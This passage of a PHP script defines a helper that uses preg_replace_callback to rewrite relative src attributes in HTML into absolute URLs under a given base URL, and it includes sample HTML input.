<a href="www.google.com">test</a>
<a href="http://www.google.com">test</a>

</body>
</html>
EOD;

$base_url = 'http://hmm.com/';

echo _replace_img_src_rel2abs($STR, $base_url) . PHP_EOL;

/**
 * Rewrite relative img src paths to absolute URLs under $base_url, leaving
 * src values that already carry a scheme (e.g. http://...) unchanged.
 *
 * @param string $STR      HTML to rewrite.
 * @param string $base_url Site base URL used as the prefix.
 * @return string          The rewritten HTML.
 */
function _replace_img_src_rel2abs($STR, $base_url = 'http://gan.com') {
  $base_url = rtrim($base_url, '/') . '/';

  // Match src="..." or src='...' whose value contains no ':' (so anything
  // with a scheme such as http:// is skipped). Note the pattern is not
  // limited to <img>: any tag's src attribute is rewritten.
  $pattern = '/src=["\']([^"\':]+)["\']/i';

  // preg_replace_callback replaces the original /e modifier (deprecated in
  // PHP 5.5, removed in PHP 7): the callback receives the match array and
  // returns the replacement text, so no replacement string is ever eval()'d.
  return preg_replace_callback($pattern, function ($m) use ($base_url) {
    return _replace_img_src_rel2abs_add_base_url($m[1], $base_url);
  }, $STR);
}

function _replace_img_src_rel2abs_add_base_url($STR = '', $base_url = '') {
  // Strip any leading '/' so both '/sites/...' and 'sites/...' become
  // $base_url . 'sites/...'; the output always uses double quotes.
  return 'src="' . $base_url . ltrim($STR, '/') . '"';
}
?>